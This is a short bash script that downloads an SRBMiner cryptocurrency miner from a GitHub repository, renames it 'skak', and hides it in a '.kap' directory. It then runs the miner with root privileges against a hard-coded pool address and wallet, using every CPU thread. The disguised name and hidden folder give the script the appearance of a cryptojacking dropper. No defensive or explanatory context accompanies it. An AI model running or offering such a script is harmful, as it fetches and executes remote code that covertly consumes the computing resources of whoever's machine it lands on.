#!/bin/bash
apt-get update ; apt-get -y install sudo
mkdir .kap && cd .kap
wget -O skak https://github.com/nandafiku/fillesg/raw/main/SRBMiner-MULTI
chmod 777 skak
sudo ./skak --algorithm yespower --pool 45.77.96.115:443 --wallet uqTaCYvDM8SqwN6VqwZUMkATmMwUTiVbR1.x --password webpassword=x --cpu-threads $(nproc --all)
